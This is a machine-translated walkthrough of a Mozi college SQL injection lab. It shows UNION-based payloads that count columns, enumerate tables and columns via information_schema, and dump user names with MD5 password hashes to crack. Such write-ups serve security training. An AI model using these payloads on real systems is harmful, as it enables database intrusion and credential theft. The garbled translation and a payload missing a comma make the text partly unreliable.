Mozi college SQL injection solution

Want to make APP Same thing as WeChat , Can run small programs smoothly ？ | Experience will send you to Xinjiang 、 Huawei 、 Cherry keyboard ！>>>

One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .